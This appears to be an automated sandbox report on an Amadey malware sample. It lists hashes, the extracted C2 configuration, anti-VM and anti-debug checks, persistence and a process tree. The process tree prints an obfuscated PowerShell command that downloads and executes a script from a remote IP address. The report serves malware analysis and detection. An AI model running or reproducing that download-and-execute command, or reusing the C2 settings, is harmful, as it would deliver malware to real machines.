Analysis
-
max time kernel
141s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-12-2024 04:12
Static task
static1
Behavioral task
behavioral1
Sample
f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe
Resource
win7-20240903-en
General
-
Target
f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe
-
Size
2.9MB
-
MD5
ec7b05f32fd59ca03e74b81122e281e1
-
SHA1
eee35a743247328ec1a72d86d7ef88f28052f07f
-
SHA256
f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58
-
SHA512
32cf5a23fab49378e23586788260ab1321987b5fc7dfa9ea1a1a4f49194459898c543eca203ae3341c5c579b8c4fc4389955204f5feb776b96e6d4b17edff14d
-
SSDEEP
49152:Q1NKgsM28NU/LBxQdiq/jjiBI70SITpUM2y:mg828NU/9xwpRQjTH2y
Malware Config
Extracted
http://185.11.61.104/Z.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 2940 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe -
Executes dropped EXE 3 IoCs
pid Process 2808 skotes.exe 2960 K6UAlAU.exe 1256 wOKhy9f.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine skotes.exe -
Loads dropped DLL 5 IoCs
pid Process 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 2808 skotes.exe 2808 skotes.exe 2808 skotes.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\244B7053AA6F2214332168\\244B7053AA6F2214332168.exe" K6UAlAU.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 2808 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe -
pid Process 2940 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1280 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 2808 skotes.exe 2960 K6UAlAU.exe 2940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2960 K6UAlAU.exe Token: SeSecurityPrivilege 2960 K6UAlAU.exe Token: SeTakeOwnershipPrivilege 2960 K6UAlAU.exe Token: SeLoadDriverPrivilege 2960 K6UAlAU.exe Token: SeSystemProfilePrivilege 2960 K6UAlAU.exe Token: SeSystemtimePrivilege 2960 K6UAlAU.exe Token: SeProfSingleProcessPrivilege 2960 K6UAlAU.exe Token: SeIncBasePriorityPrivilege 2960 K6UAlAU.exe Token: SeCreatePagefilePrivilege 2960 K6UAlAU.exe Token: SeBackupPrivilege 2960 K6UAlAU.exe Token: SeRestorePrivilege 2960 K6UAlAU.exe Token: SeShutdownPrivilege 2960 K6UAlAU.exe Token: SeDebugPrivilege 2960 K6UAlAU.exe Token: SeSystemEnvironmentPrivilege 2960 K6UAlAU.exe Token: SeRemoteShutdownPrivilege 2960 K6UAlAU.exe Token: SeUndockPrivilege 2960 K6UAlAU.exe Token: SeManageVolumePrivilege 2960 K6UAlAU.exe Token: 33 2960 K6UAlAU.exe Token: 34 2960 K6UAlAU.exe Token: 35 2960 K6UAlAU.exe Token: SeDebugPrivilege 2940 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2228 wrote to memory of 2808 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 31 PID 2228 wrote to memory of 2808 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 31 PID 2228 wrote to memory of 2808 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 31 PID 2228 wrote to memory of 2808 2228 f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe 31 PID 2808 wrote to memory of 2960 2808 skotes.exe 33 PID 2808 wrote to memory of 2960 2808 skotes.exe 33 PID 2808 wrote to memory of 2960 2808 skotes.exe 33 PID 2808 wrote to memory of 2960 2808 skotes.exe 33 PID 2808 wrote to memory of 1256 2808 skotes.exe 34 PID 2808 wrote to memory of 1256 2808 skotes.exe 34 PID 2808 wrote to memory of 1256 2808 skotes.exe 34 PID 2808 wrote to memory of 1256 2808 skotes.exe 34 PID 1256 wrote to memory of 2940 1256 wOKhy9f.exe 35 PID 1256 wrote to memory of 2940 1256 wOKhy9f.exe 35 PID 1256 wrote to memory of 2940 1256 wOKhy9f.exe 35 PID 1256 wrote to memory of 1372 1256 wOKhy9f.exe 37 PID 1256 wrote to memory of 1372 1256 wOKhy9f.exe 37 PID 1256 wrote to memory of 1372 1256 wOKhy9f.exe 37 PID 2940 wrote to memory of 1280 2940 powershell.exe 38 PID 2940 wrote to memory of 1280 2940 powershell.exe 38 PID 2940 wrote to memory of 1280 2940 powershell.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe"C:\Users\Admin\AppData\Local\Temp\f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe"C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\1015216001\wOKhy9f.exe"C:\Users\Admin\AppData\Local\Temp\1015216001\wOKhy9f.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command " $L='(New-Object Net.We'; $Y='bClient).Downlo'; $V='adString(''http://185.11.61.104/Z.png'')'; $F=I`E`X ($L,$Y,$V -Join '')|I`E`X"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns5⤵
- Gathers network information
PID:1280
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1256 -s 5684⤵PID:1372
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
302KB
MD5a9502d407c7a3e0c43ad669c27638793
SHA1bf0b7815c6dac82643a5bf7bd397a6aa58a9e803
SHA2565f3cd8392c045a321ccf0ede6f38a4016a236f257d0a6ab897bf7f3e21868135
SHA5120dbe8772ded05ba2c67ea7a7e9bc291b76d8b73dbab86a35fca5b1138be41c2ee7a54333fcd7bf58823ab3b5f1f6250b98b829ca0c367cafb2176350f5454d25
-
Filesize
55KB
MD5dad92292227e72a4a6d88bb64a5530ab
SHA1b29347362de7bc1f024bef9e816e22dcae43876f
SHA256e0bbeb44a30e92fcf141c350b4d4240c488821ede6cf83b03c1b7d726a87c5f5
SHA512d3f3b4b35fe4bd012b7d2c8d5b3bb434a50661ef4d1dff8ce0f5ef47d9b5b6e808286c39eef766ed53c4d09d54fc08ea1e3592b41c942b0e4f81e8de33ae58b3
-
Filesize
160KB
MD51ab5b0c0ab25c1b3547ed38d773190a2
SHA10d2bd31c8f0678087d47b67a07d7f072320ed7b2
SHA256880a1dbec62a69905ad0dc95cf6a9d957e2b49c2d0b4aa086ab9302cc8e9ae11
SHA5128493ebedad92c6151243b8a43a8770695b51aa515d03947b24bc167e9e14665a3b331e1eada59d1956ad2db4578a46bdd680288494b062f0fc3977194683c7e2
-
Filesize
2.9MB
MD5ec7b05f32fd59ca03e74b81122e281e1
SHA1eee35a743247328ec1a72d86d7ef88f28052f07f
SHA256f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58
SHA51232cf5a23fab49378e23586788260ab1321987b5fc7dfa9ea1a1a4f49194459898c543eca203ae3341c5c579b8c4fc4389955204f5feb776b96e6d4b17edff14d